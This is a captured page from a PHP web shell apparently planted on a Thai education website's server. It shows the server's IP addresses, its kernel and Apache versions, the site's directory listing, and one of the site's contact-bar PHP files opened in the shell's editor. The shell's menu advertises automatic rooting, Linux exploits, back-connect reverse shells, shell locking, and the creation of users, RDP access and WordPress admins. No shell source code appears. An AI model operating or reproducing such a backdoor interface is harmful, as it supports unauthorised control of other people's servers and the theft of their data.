Linux 45-56-67-123 5.14.0-503.16.1.el9_5.x86_64 #1 SMP PREEMPT_DYNAMIC Fri Dec 13 01:47:05 EST 2024 x86_64
Apache/2.4.62 (AlmaLinux) OpenSSL/3.2.2
: 45.56.67.123 | : 18.190.152.109
Cant Read [ /etc/named.conf ]
8.3.15
apache
www.github.com/MadExploits
Terminal
AUTO ROOT
Adminer
Backdoor Destroyer
Linux Exploit
Lock Shell
Lock File
Create User
CREATE RDP
PHP Mailer
BACKCONNECT
UNLOCK SHELL
HASH IDENTIFIER
CPANEL RESET
CREATE WP USER
README
+ Create Folder
+ Create File
/
var /
www /
website2023 /
myeducation.co.th /
[ HOME SHELL ]
Name
Size
Permission
Action
Structure
[ DIR ]
drwxr-xr-x
UserFiles
[ DIR ]
drwxr-xr-x
admin
[ DIR ]
drwxr-xr-x
css
[ DIR ]
drwxr-xr-x
fonts
[ DIR ]
drwxr-xr-x
images
[ DIR ]
drwxr-xr-x
img
[ DIR ]
drwxr-xr-x
js
[ DIR ]
drwxr-xr-x
model
[ DIR ]
drwxr-xr-x
1Head.php
8.88
KB
-rw-r--r--
2HeadMenu.php
2.27
KB
-rw-r--r--
2banner.php
105
B
-rw-r--r--
2banner_mo.php
9.16
KB
-rw-r--r--
2banner_pc.php
3.81
KB
-rw-r--r--
3Footer.php
227
B
-rw-r--r--
4End.php
1.39
KB
-rw-r--r--
about.php
3.46
KB
-rw-r--r--
banner_next_country.php
3.1
KB
-rw-r--r--
banner_next_student_reviews.ph...
3.13
KB
-rw-r--r--
call_contact_mo.php
16.06
KB
-rw-r--r--
call_contact_pc.php
4.2
KB
-rw-r--r--
city.php
7.28
KB
-rw-r--r--
contact.php
5.92
KB
-rw-r--r--
country.php
5.72
KB
-rw-r--r--
detail.php
284
B
-rw-r--r--
detail_gallery.php
4.28
KB
-rw-r--r--
detail_mo.php
39.4
KB
-rw-r--r--
detail_promotion.php
3.01
KB
-rw-r--r--
detail_student_reviews.php
2.89
KB
-rw-r--r--
detail_tip.php
3.56
KB
-rw-r--r--
footer_mo.php
6.66
KB
-rw-r--r--
footer_pc.php
6.79
KB
-rw-r--r--
gallery.php
7.37
KB
-rw-r--r--
head_footer_3.php
3.59
KB
-rw-r--r--
hotpromotion.php
6.83
KB
-rw-r--r--
index.php
171
B
-rw-r--r--
index_country.php
121
B
-rw-r--r--
index_country_mo.php
4.38
KB
-rw-r--r--
index_country_pc.php
4
KB
-rw-r--r--
index_gallery.php
9.77
KB
-rw-r--r--
index_hot_promotion.php
9.2
KB
-rw-r--r--
index_student_reviews.php
9.87
KB
-rw-r--r--
index_video.php
4.54
KB
-rw-r--r--
shool.php
4.71
KB
-rw-r--r--
student_reviews.php
6.77
KB
-rw-r--r--
tip.php
7.84
KB
-rw-r--r--
Delete
Unzip
Zip
${this.title}
Close
Code Editor : call_contact_mo.php
<style> body { margin: 0; height: 2000px; } .icon-bar { position: fixed; top: 50%; -webkit-transform: translateY(-50%); -ms-transform: translateY(-50%); transform: translateY(-50%); } .icon-bar a { display: block; text-align: center; padding: 16px; transition: all 0.3s ease; color: white; font-size: 20px; } .icon-bar a:hover { background-color: #000; } .facebook { background: #3B5998; color: white; } .twitter { background: #55ACEE; color: white; } .google { background: #dd4b39; color: white; } .linkedin { background: #007bb5; color: white; } .youtube { background: #bb0000; color: white; } .content { margin-left: 75px; font-size: 30px; } </style> <div class="icon-bar" style="z-index: 9;"> <?PHP $HomeID = '112'; $SQL_Home = " SELECT home.Home_ID, home.Member_ID, member.Member_NameEN, member.Position_ID, position.Position_Name, home.Home_Date, home.Home_Time, home.Home_Visitors, home.Home_Sub, home.Home_Short,home.Home_Short2,home.Home_Short3, home.Home_Detail, home.Home_Category, home.StatusHome_ID, status_home.StatusHome_Name, home.StatusShowPage_ID, status_showpage.StatusShowPage_Name FROM status_showpage INNER JOIN (status_home INNER JOIN (position INNER JOIN (member INNER JOIN home ON member.Member_ID = home.Member_ID) ON position.Position_ID = member.Position_ID) ON status_home.StatusHome_ID = home.StatusHome_ID) ON status_showpage.StatusShowPage_ID = home.StatusShowPage_ID WHERE home.StatusHome_ID = 1 AND home.StatusShowPage_ID = '$HomeID' ORDER BY home.Home_ID asc LIMIT 9 "; $objQuery_Home = $objConnect->query($SQL_Home); while ($objResult_Home = mysqli_fetch_array($objQuery_Home)) { $HomeID = $objResult_Home["Home_ID"]; $HomeSub = $objResult_Home["Home_Sub"]; $HomeShort = $objResult_Home["Home_Short"]; $HomeDetail = $objResult_Home["Home_Detail"]; $HomeShort2 = $objResult_Home["Home_Short2"]; $HomeShort3 = $objResult_Home["Home_Short3"]; $HomeDate = $objResult_Home["Home_Date"]; $StatusShowPageID = $objResult_Home["StatusShowPage_ID"]; $Home_Visitors = $objResult_Home["Home_Visitors"]; $date = date_create($HomeDate); $NewDate = date_format($date, "F d , Y"); $NewDate1 = date_format($date, "d"); $NewDate2 = date_format($date, "F"); // Show img only LIMIT 1 $SQL_Home_Img = " SELECT img_home.Home_ID, img_home.ImgHome_Img, img_home.ImgHome_Sort, img_home.StatusImgHome_ID FROM img_home WHERE img_home.Home_ID = $HomeID ORDER BY img_home.ImgHome_Sort ASC LIMIT 1 "; $objQuery_Home_Img = $objConnect->query($SQL_Home_Img); // พากหัว หลัก if ($HomeSub == "-") { $Check_HomeSub2 = ""; } else { $Check_HomeSub2 = $HomeSub; } //map if ($HomeShort == "-") { $Check_HomeShort2 = ""; } else { $Check_HomeShort2 = $HomeShort; } //เกริน if ($HomeDetail == "-") { $Check_HomeShort3 = ""; } else { $Check_HomeShort3 = $HomeShort2; } //เวลา if ($HomeDetail == "-") { $Check_HomeShort4 = ""; } else { $Check_HomeShort4 = $HomeShort3; } //รายละเอียด if ($HomeDetail == "-") { $Check_HomeDetai2 = ""; } else { $Check_HomeDetai2 = $HomeDetail; } ?> <?PHP while ($objResult_Home_Img = mysqli_fetch_array($objQuery_Home_Img)) { $HomeID_Img = $objResult_Home_Img["Home_ID"]; $HomeImg_Img = $objResult_Home_Img["ImgHome_Img"]; ?> <a href="<?= $Check_HomeShort2; ?>" class="<?= $Check_HomeSub2; ?>"><i class="fa"><img src="model/upload/img/IMG_Home/<?= $HomeImg_Img; ?>" style="width: 35px;"></i></a> <?PHP } ?> <?PHP } ?> </div> <style> .line { background: #4CAF50; } .instagram { background-image: linear-gradient(to right, red , #E91E63); } .mail { background: #00bcd4; } </style> <div class="product-bottom-panel"> <div class="product-cart-and-buy-buttons"> <a href="https://line.me/ti/p/7YHJY8GgBQ" class="btn btn-primary product-bottom-panel__buy-now tt_box_buy">Add Line</a> </div> <div class="product-cart-and-buy-buttons"> <a href="tel:089-1776505" class="btn btn-primary product-bottom-panel__buy-now tt_box_buy2">Call</a> </div> </div> <style> .tt_box_buy { background: #7ac358 !important; color: #fff !important; border: 2px solid #fff0 !important; height: 100% !important; } .tt_box_buy2 { background: #3f8e57 !important; color: #fff !important; border: 2px solid #fff0 !important; height: 100% !important; } .product-bottom-panel { background-color: #fff; border: 0 solid rgba(0, 0, 0, .09) !important; border-top: 1px solid rgba(0, 0, 0, .09) !important; box-shadow: 0 0 6px 0 rgba(0, 0, 0, .09); position: fixed; bottom: 0; height: 3rem; width: 100%; max-width: 37.5rem; display: -webkit-box; display: -webkit-flex; display: -moz-box; display: -ms-flexbox; display: flex; z-index: 101 } .product-bottom-panel__add-to-cart, .product-bottom-panel__buy-now, .product-bottom-panel__chat-now { background-color: #00bfa5; -webkit-box-flex: 1; -webkit-flex: 1; -moz-box-flex: 1; -ms-flex: 1; flex: 1; display: -webkit-box; display: -webkit-flex; display: -moz-box; display: -ms-flexbox; display: flex; -webkit-box-pack: center; -webkit-justify-content: center; -moz-box-pack: center; -ms-flex-pack: center; justify-content: center; -webkit-box-align: center; -webkit-align-items: center; -moz-box-align: center; -ms-flex-align: center; align-items: center; color: #fff; font-size: .625rem; cursor: pointer; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none } .product-bottom-panel__add-to-cart span.disabled, .product-bottom-panel__add-to-cart svg.disabled, .product-bottom-panel__buy-now span.disabled, .product-bottom-panel__buy-now svg.disabled, .product-bottom-panel__chat-now span.disabled, .product-bottom-panel__chat-now svg.disabled { opacity: .5 } .product-bottom-panel__add-to-cart, .product-bottom-panel__chat-now { -webkit-box-orient: vertical; -webkit-box-direction: normal; -webkit-flex-direction: column; -moz-box-orient: vertical; -moz-box-direction: normal; -ms-flex-direction: column; flex-direction: column } .product-bottom-panel__add-to-cart .stardust-icon, .product-bottom-panel__chat-now .stardust-icon { -webkit-box-flex: 0; -webkit-flex: 0 1 auto; -moz-box-flex: 0; -ms-flex: 0 1 auto; flex: 0 1 auto; width: 1.5rem; height: 1.5rem; margin-bottom: .25rem } .product-bottom-panel__add-to-cart-text, .product-bottom-panel__chat-now-text { -webkit-box-flex: 0; -webkit-flex: 0 1 auto; -moz-box-flex: 0; -ms-flex: 0 1 auto; flex: 0 1 auto; white-space: nowrap } .product-bottom-panel__buy-now { background-color: #ee4d2d; font-size: .875rem; -webkit-box-flex: 2; -webkit-flex: 2; -moz-box-flex: 2; -ms-flex: 2; flex: 2 } .product-bottom-panel__separator { -webkit-box-flex: 0; -webkit-flex: 0; -moz-box-flex: 0; -ms-flex: 0; flex: 0; background-color: #00bfa5; display: -webkit-box; display: -webkit-flex; display: -moz-box; display: -ms-flexbox; display: flex; -webkit-box-align: center; -webkit-align-items: center; -moz-box-align: center; -ms-flex-align: center; align-items: center } .product-bottom-panel__separator-real { border: 0 solid rgba(0, 0, 0, .09) !important; border-left: 1px solid rgba(0, 0, 0, .09) !important; height: 1.75rem; -webkit-box-flex: 0; -webkit-flex: 0; -moz-box-flex: 0; -ms-flex: 0; flex: 0 } .product-bottom-panel__coming-soon-bar { background-color: rgba(0, 0, 0, .26); color: #fff; font-size: 1.125rem; -webkit-flex: 3; -ms-flex: 3; flex: 3; -webkit-box-align: center; -webkit-align-items: center; -moz-box-align: center; -ms-flex-align: center; align-items: center; -webkit-box-pack: center; -webkit-justify-content: center; -moz-box-pack: center; -ms-flex-pack: center; justify-content: center } .product-bottom-panel__coming-soon-bar, .product-cart-and-buy-buttons { display: -webkit-box; display: -webkit-flex; display: -moz-box; display: -ms-flexbox; display: flex; -webkit-box-flex: 3; -moz-box-flex: 3 } .product-cart-and-buy-buttons { -webkit-box-orient: horizontal; -webkit-box-direction: normal; -webkit-flex-direction: row; -moz-box-orient: horizontal; -moz-box-direction: normal; -ms-flex-direction: row; flex-direction: row; -webkit-flex: 3; -ms-flex: 3; flex: 3 } .product-bottom-panel-wrapper { height: 3.75rem } .theme--ofs .product-bottom-panel { background-color: #fff } .theme--ofs .product-bottom-panel__add-to-cart, .theme--ofs .product-bottom-panel__chat-now, .theme--ofs .product-bottom-panel__separator { background-color: #fff; color: rgba(0, 0, 0, .87) } .theme--ofs .product-bottom-panel__buy-now { background-color: #d0011b } .theme--ofs .product-bottom-panel__chat-now-icon { color: #d0011b } .product-bottom-panel { background-color: #fff; border: 0 solid rgba(0, 0, 0, .09) !important; border-top: 1px solid rgba(0, 0, 0, .09) !important; box-shadow: 0 0 6px 0 rgba(0, 0, 0, .09); position: fixed; bottom: 0; height: 6%; width: 100%; max-width: 100%; display: -webkit-box; display: -webkit-flex; display: -moz-box; display: -ms-flexbox; display: flex; z-index: 101; } .product-bottom-panel__add-to-cart, .product-bottom-panel__buy-now, .product-bottom-panel__chat-now { background-color: #00bfa5; -webkit-box-flex: 1; -webkit-flex: 1; -moz-box-flex: 1; -ms-flex: 1; flex: 1; display: -webkit-box; display: -webkit-flex; display: -moz-box; display: -ms-flexbox; display: flex; -webkit-box-pack: center; -webkit-justify-content: center; -moz-box-pack: center; -ms-flex-pack: center; justify-content: center; -webkit-box-align: center; -webkit-align-items: center; -moz-box-align: center; -ms-flex-align: center; align-items: center; color: #fff; font-size: .625rem; cursor: pointer; -webkit-user-select: none; -moz-user-select: none; -ms-user-select: none; user-select: none } .product-bottom-panel__add-to-cart span.disabled, .product-bottom-panel__add-to-cart svg.disabled, .product-bottom-panel__buy-now span.disabled, .product-bottom-panel__buy-now svg.disabled, .product-bottom-panel__chat-now span.disabled, .product-bottom-panel__chat-now svg.disabled { opacity: .5 } .product-bottom-panel__add-to-cart, .product-bottom-panel__chat-now { -webkit-box-orient: vertical; -webkit-box-direction: normal; -webkit-flex-direction: column; -moz-box-orient: vertical; -moz-box-direction: normal; -ms-flex-direction: column; flex-direction: column } .product-bottom-panel__add-to-cart .stardust-icon, .product-bottom-panel__chat-now .stardust-icon { -webkit-box-flex: 0; -webkit-flex: 0 1 auto; -moz-box-flex: 0; -ms-flex: 0 1 auto; flex: 0 1 auto; width: 5.5rem; height: 5.5rem; margin-bottom: 1.25rem; } .product-bottom-panel__add-to-cart-text, .product-bottom-panel__chat-now-text { -webkit-box-flex: 0; -webkit-flex: 0 1 auto; -moz-box-flex: 0; -ms-flex: 0 1 auto; flex: 0 1 auto; white-space: nowrap } .product-bottom-panel__buy-now { background-color: #ee4d2d; font-size: .875rem; -webkit-box-flex: 2; -webkit-flex: 2; -moz-box-flex: 2; -ms-flex: 2; flex: 2 } .product-bottom-panel__separator { -webkit-box-flex: 0; -webkit-flex: 0; -moz-box-flex: 0; -ms-flex: 0; flex: 0; background-color: #00bfa5; display: -webkit-box; display: -webkit-flex; display: -moz-box; display: -ms-flexbox; display: flex; -webkit-box-align: center; -webkit-align-items: center; -moz-box-align: center; -ms-flex-align: center; align-items: center } .product-bottom-panel__separator-real { border: 0 solid rgba(0, 0, 0, .09) !important; border-left: 1px solid rgba(0, 0, 0, .09) !important; height: 1.75rem; -webkit-box-flex: 0; -webkit-flex: 0; -moz-box-flex: 0; -ms-flex: 0; flex: 0 } .product-bottom-panel__coming-soon-bar { background-color: rgba(0, 0, 0, .26); color: #fff; font-size: 1.125rem; -webkit-flex: 3; -ms-flex: 3; flex: 3; -webkit-box-align: center; -webkit-align-items: center; -moz-box-align: center; -ms-flex-align: center; align-items: center; -webkit-box-pack: center; -webkit-justify-content: center; -moz-box-pack: center; -ms-flex-pack: center; justify-content: center } .product-bottom-panel__coming-soon-bar, .product-cart-and-buy-buttons { display: -webkit-box; display: -webkit-flex; display: -moz-box; display: -ms-flexbox; display: flex; -webkit-box-flex: 3; -moz-box-flex: 3 } .product-cart-and-buy-buttons { -webkit-box-orient: horizontal; -webkit-box-direction: normal; -webkit-flex-direction: row; -moz-box-orient: horizontal; -moz-box-direction: normal; -ms-flex-direction: row; flex-direction: row; -webkit-flex: 3; -ms-flex: 3; flex: 3 } .product-bottom-panel-wrapper { height: 3.75rem } .theme--ofs .product-bottom-panel { background-color: #fff } .theme--ofs .product-bottom-panel__add-to-cart, .theme--ofs .product-bottom-panel__chat-now, .theme--ofs .product-bottom-panel__separator { background-color: #fff; color: rgba(0, 0, 0, .87) } .theme--ofs .product-bottom-panel__buy-now { background-color: #d0011b } .theme--ofs .product-bottom-panel__chat-now-icon { color: #d0011b } ._1ITF4T { position: fixed; left: 0; right: 0; bottom: -webkit-calc(3rem - 1px); bottom: calc(3rem - 1px); padding: .5625rem; line-height: .875rem; font-size: .75rem; text-align: center; color: #fff; background-color: rgba(0, 0, 0, .65) } ._1ITF4T+.product-bottom-panel-wrapper .product-bottom-panel { border-top-color: rgba(0, 0, 0, .65) !important } .btn { background-color: transparent; color: #292929; border: 2px solid #000; font-size: 60px; height: 120px; font-size: 37px; line-height: 51px; font-weight: 500; padding: 30px 45px; text-transform: capitalize; border-radius: 0px; position: relative; -webkit-transition: all 0.3s ease 0s; -o-transition: all 0.3s ease 0s; transition: all 0.3s ease 0s; } .single-product-quantity .btn i { font-size: 65px; margin-right: 10px; } .single-product-quantity .product-quantity { background: #e0e0e0; border: 1px solid #ededed; float: left; margin-right: 15px; padding: 31px 25px; border-radius: 0; } .product-meta .posted-in { color: #292929; font-size: 40px; font-weight: 700; margin-right: 10px; text-transform: uppercase; } .single-product-quantity .product-quantity input { background: none; border: none; color: #292929; font-size: 60px; font-weight: 400; height: 55px; line-height: 53px; padding: 0; width: 60px; } .single-product-description p { line-height: 60px; color: #929292; } </style>
Close